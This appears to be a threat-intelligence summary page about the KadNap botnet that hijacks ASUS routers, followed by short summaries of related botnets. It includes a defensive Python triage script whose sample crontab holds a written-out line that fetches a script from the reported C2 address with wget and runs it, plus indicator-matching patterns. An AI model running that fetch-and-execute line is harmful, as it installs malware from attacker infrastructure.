

KadNap Botnet Hijacks ASUS Routers for Cybercrime Proxy Network

2 unique sources, 2 articles

Summary


A new botnet named KadNap targets ASUS routers and other edge networking devices, turning them into proxies for malicious traffic. Since August 2025, it has grown to 14,000 devices, using a peer-to-peer network and a custom Kademlia Distributed Hash Table (DHT) protocol to evade detection. The botnet is linked to the Doppelganger proxy service, which sells access to infected devices for cybercrime activities. Most infected devices are located in the United States (60%), followed by Taiwan, Hong Kong, and Russia.

The infection begins with a malicious script that downloads an ELF binary, establishing persistence via a cron job. The botnet uses NTP servers for time synchronization and a modified Kademlia protocol for communication, making it difficult to identify and disrupt the command-and-control (C2) infrastructure. Lumen Technologies has taken proactive measures to block network traffic to and from the control infrastructure, but the disruption is limited to their network. Indicators of compromise will be released to help others disrupt the botnet.

KadNap uses a shell script (aic.sh), downloaded from the C2 server (212.104.141[.]140), to initiate the process of conscripting the victim into the P2P network. The malware creates a cron job that retrieves the shell script from the server at the 55-minute mark of every hour, renames it to .asusrouter, and runs it. Once persistence is established, the script pulls a malicious ELF file, renames it to kad, and executes it. The files fwr.sh and /tmp/.sose contain functionality to close port 22, the standard TCP port for Secure Shell (SSH), on the infected device and to extract a list of C2 IP address:port combinations to connect to.
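The summary above names a handful of host-side artifacts (a cron entry at minute 55 fetching aic.sh from 212.104.141[.]140, the .asusrouter and kad files, fwr.sh, /tmp/.sose, and a blocked TCP/22). The following triage script is an added example, not code from the reports or from Lumen; it runs offline over text dumps a defender already has (a crontab listing, a file listing, BusyBox-style `ps` output, and `iptables -S` output) and flags lines that match those reported indicators. The C2 address is the one given (defanged) on this page; the sample inputs are constructed, and the BusyBox `ps` column layout and the `iptables -S` rule format are assumptions about the device.

```python
"""Offline triage for the KadNap indicators described above (added example).

Inputs are text dumps a defender already has, so nothing here touches the
network. All sample inputs at the bottom are constructed.
"""
import re
from dataclasses import dataclass

# Indicators reported in the write-up (the C2 address is given defanged there).
C2_IP = "212.104.141.140"
ARTIFACT_NAMES = {"aic.sh", ".asusrouter", "kad", "fwr.sh", ".sose"}
CRON_MINUTE = "55"   # the stager is re-fetched at minute 55 of every hour


@dataclass
class Finding:
    kind: str      # "cron", "file", "process" or "firewall"
    detail: str


CRON_RE = re.compile(r"^(\S+)\s+(\S+)\s+(\S+)\s+(\S+)\s+(\S+)\s+(.+)$")
TOKEN_RE = re.compile(r"[^\s/;|&]+")     # path components and words in a command
SSH_BLOCK_RE = re.compile(r"--dport\s+22\b.*-j\s+(DROP|REJECT)")


def parse_crontab(text):
    """Return (minute, hour, command) for each non-comment crontab line."""
    entries = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        m = CRON_RE.match(line)
        if m:
            minute, hour, _dom, _mon, _dow, command = m.groups()
            entries.append((minute, hour, command))
    return entries


def check_crontab(text):
    """Flag cron entries that match the reported persistence mechanism."""
    findings = []
    for minute, hour, command in parse_crontab(text):
        hits = []
        if C2_IP in command:
            hits.append("contacts reported C2 address")
        if minute == CRON_MINUTE and hour == "*":
            hits.append("runs at minute 55 of every hour")
        if ARTIFACT_NAMES & set(TOKEN_RE.findall(command)):
            hits.append("references a known artifact name")
        if hits:
            findings.append(Finding("cron", f"{command!r}: " + "; ".join(hits)))
    return findings


def check_paths(paths):
    """Flag files whose basename matches a reported artifact (e.g. /tmp/.sose)."""
    return [Finding("file", p) for p in paths if p.rsplit("/", 1)[-1] in ARTIFACT_NAMES]


def check_processes(ps_text):
    """Flag running processes whose executable basename is 'kad' (BusyBox ps layout assumed)."""
    findings = []
    for line in ps_text.splitlines()[1:]:   # skip the header row
        parts = line.split(None, 3)         # PID USER TIME COMMAND
        if len(parts) < 4:
            continue
        exe = parts[3].split()[0].rsplit("/", 1)[-1]
        if exe == "kad":
            findings.append(Finding("process", line.strip()))
    return findings


def check_firewall(iptables_text):
    """Flag rules that block inbound TCP/22: the malware closes SSH on the device."""
    return [Finding("firewall", r.strip()) for r in iptables_text.splitlines()
            if SSH_BLOCK_RE.search(r)]


def triage(crontab, paths, ps_text, iptables_text):
    """Run every check and return the combined list of findings."""
    return (check_crontab(crontab) + check_paths(paths)
            + check_processes(ps_text) + check_firewall(iptables_text))


# Constructed sample inputs mirroring the chain described in the write-up.
SAMPLE_CRONTAB = """# constructed crontab dump
0 3 * * * /sbin/logrotate /etc/logrotate.conf
55 * * * * wget -q http://212.104.141.140/aic.sh -O /tmp/.asusrouter && sh /tmp/.asusrouter
"""
SAMPLE_PATHS = ["/tmp/.sose", "/tmp/.asusrouter", "/tmp/kad", "/etc/passwd", "/var/log/messages"]
SAMPLE_PS = """  PID USER       TIME  COMMAND
    1 admin      0:03  /sbin/init
  842 admin      0:00  /tmp/kad
  901 admin      0:00  httpd
"""
SAMPLE_IPTABLES = """-P INPUT ACCEPT
-A INPUT -p tcp -m tcp --dport 22 -j DROP
-A INPUT -p tcp -m tcp --dport 80 -j ACCEPT
"""

if __name__ == "__main__":
    for f in triage(SAMPLE_CRONTAB, SAMPLE_PATHS, SAMPLE_PS, SAMPLE_IPTABLES):
        print(f"[{f.kind}] {f.detail}")
```

The cron check scores each entry on three independent signals (the C2 address, the minute-55 schedule, and a known artifact name) so that a changed download host or a renamed stager still produces a hit on the other two; a firewall rule dropping TCP/22 is only a weak signal on its own and is reported for correlation with the other findings.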

Timeline

  1. 10.03.2026 17:01 · 2 articles

    KadNap Botnet Hijacks ASUS Routers for Cybercrime Proxy Network

    Since August 2025, the KadNap botnet has grown to 14,000 devices, using a peer-to-peer network and a custom Kademlia DHT protocol to evade detection. The botnet is linked to the Doppelganger proxy service, which sells access to infected devices for cybercrime activities. Lumen Technologies has taken proactive measures to block network traffic to and from the control infrastructure, but the disruption is limited to their network. Indicators of compromise will be released to help others disrupt the botnet. The infection begins with a malicious script (aic.sh), downloaded from the C2 server (212.104.141[.]140), which initiates the process of conscripting the victim into the P2P network. The malware creates a cron job that retrieves the shell script from the server at the 55-minute mark of every hour, renames it to .asusrouter, and runs it. Once persistence is established, the script pulls a malicious ELF file, renames it to kad, and executes it. The files fwr.sh and /tmp/.sose contain functionality to close port 22, the standard TCP port for Secure Shell (SSH), on the infected device and to extract a list of C2 IP address:port combinations to connect to.



Similar Happenings

SSHStalker Linux Botnet Uses IRC for C2 Communications

A new Linux botnet named SSHStalker has been documented, utilizing the outdated IRC protocol for command-and-control (C2) operations. The botnet employs classic IRC mechanics, including multiple C-based bots and multi-server/channel redundancy, prioritizing resilience and scale over stealth. It achieves initial access through automated SSH scanning and brute-forcing, using a Go binary disguised as nmap. Once infected, hosts are used to scan for additional SSH targets, and the botnet includes exploits for 16 CVEs targeting older Linux kernel versions. The botnet also performs AWS key harvesting, website scanning, and includes cryptomining kits and DDoS capabilities. Notably, SSHStalker maintains persistent access without immediate follow-on post-exploitation behavior, suggesting it may be used for staging, testing, or strategic access retention. The threat actor is suspected to be of Romanian origin, with operational overlaps with the hacking group Outlaw (aka Dota).

ShadowV2 Botnet Targets Misconfigured AWS Docker Containers and IoT Devices for DDoS Attacks

The ShadowV2 botnet targets misconfigured Docker containers on Amazon Web Services (AWS) to deploy a Go-based malware, turning infected systems into nodes for a distributed denial-of-service (DDoS) botnet. This botnet is available for rent to conduct DDoS attacks, employing advanced techniques such as HTTP/2 Rapid Reset and bypassing Cloudflare's Under Attack mode. The botnet was detected on June 24, 2025, and is believed to be part of a DDoS-for-Hire service. The botnet uses a Python-based C2 framework hosted on GitHub Codespaces and a Go-based remote access trojan (RAT) for command execution and communication. The malware first spawns a generic setup container from an Ubuntu image, installs necessary tools, and then builds and deploys a live container. This approach may help avoid leaving forensic artifacts on the victim machine. The malware communicates with a C2 server to receive commands and conduct attacks. The botnet's dynamic container deployment allows highly configurable attacks while concealing activity behind cloud-native architecture. The botnet targets 24,000 IP addresses with port 2375 open, though not all are exploitable. The malware sends a heartbeat signal to the C2 server every second and polls for new attack commands every five seconds. The botnet is actively used, with observed commands to launch attacks against at least one website. Additionally, the ShadowV2 botnet has been observed targeting IoT devices from D-Link, TP-Link, and other vendors with exploits for known vulnerabilities. The botnet was active during the major AWS outage in October, possibly as a test run. The malware identifies itself as 'ShadowV2 Build v1.0.0 IoT version' and is similar to the Mirai LZRD variant. The botnet supports DDoS attacks on UDP, TCP, and HTTP protocols, with various flood types for each.

Aisuru botnet conducts record-breaking DDoS attacks, targeting U.S. ISPs and Microsoft Azure

The Aisuru/Kimwolf botnet ecosystem continues to evolve, now disrupting critical anonymity infrastructure alongside its record-breaking DDoS campaigns. In February 2026, Kimwolf operators accidentally crippled the I2P anonymity network by attempting to onboard 700,000 infected devices as nodes, overwhelming the network's typical 15,000–20,000-device capacity and triggering a Sybil attack that halved I2P's functionality. This follows the botnet's 31.4 Tbps DDoS attack (November 2025) and holiday-themed "The Night Before Christmas" campaign (December 19, 2025), which peaked at 24 Tbps, 9 Bpps, and 205 Mrps, part of a 100% YoY increase in DDoS volume (47.1 million attacks mitigated in 2025). With over 6 million infected devices (1–4M IoT for Aisuru; >2M Android TVs/boxes for Kimwolf), the botnets blend hyper-volumetric DDoS with residential proxy monetization, targeting sectors beyond gaming to include telecom, IT, finance, AI, and now anonymity networks. The January 2026 takedown of IPIDEA, a key proxy enabler, reduced millions of exit nodes, but persistent infections and new evasion tactics (e.g., I2P/Tor C2 experimentation, ENS-based domains) highlight the botnets' adaptive resilience. Despite internal operator conflicts reducing Kimwolf's scale by 600,000+ devices, the ecosystem remains a systemic risk to global internet stability, enterprise security, and privacy infrastructure.

RapperBot Botnet Administrator Charged in the U.S.

The RapperBot botnet, operated by Ethan Foltz, has been responsible for over 370,000 DDoS attacks targeting victims in over 80 countries since 2021. The botnet, also known as Eleven Eleven Botnet and CowBot, primarily infects DVRs and Wi-Fi routers to launch DDoS attacks and mine Monero. Foltz, 22, from Eugene, Oregon, was charged with aiding and abetting computer intrusions related to the botnet. The botnet's command-and-control infrastructure was seized during a search of Foltz's residence on August 6, 2025. The botnet has targeted U.S. government systems, major media platforms, gaming companies, and large tech firms. It added a cryptomining module in 2023 to diversify its revenue stream. The attacks ranged from several terabits to over 1 billion packets per second (pps), with the largest attack exceeding 6 Tbps. The disruption of RapperBot is part of Operation PowerOFF, an international effort to dismantle DDoS-for-hire infrastructures. The botnet has not shown any signs of resurgence in malicious activity following the seizure of its infrastructure.

Erlang/OTP SSH RCE Exploits Targeting OT Firewalls

A surge in exploitation of CVE-2025-32433, a critical security flaw in Erlang/OTP SSH, has been observed since May 2025. Approximately 70% of these exploits target operational technology (OT) firewalls. This vulnerability, patched in April 2025, allows attackers to execute arbitrary code on vulnerable systems without authentication. The attacks have primarily affected the healthcare, agriculture, media, entertainment, and high technology sectors in the U.S., Canada, Brazil, India, Australia, Japan, the Netherlands, Ireland, and France. The exploitation involves using reverse shells to gain unauthorized remote access to target networks. The specific threat actors behind these efforts remain unidentified. The flaw is due to improper state enforcement in the Erlang/OTP SSH daemon, allowing unauthenticated clients to execute commands by sending SSH connection protocol messages to open SSH ports. The flaw has been exploited to create TCP connections and bind them to a shell, allowing interactive command execution over the network. The flaw could have severe consequences for an organization, its network, and its operations, including the compromise of sensitive information and the disruption of operations.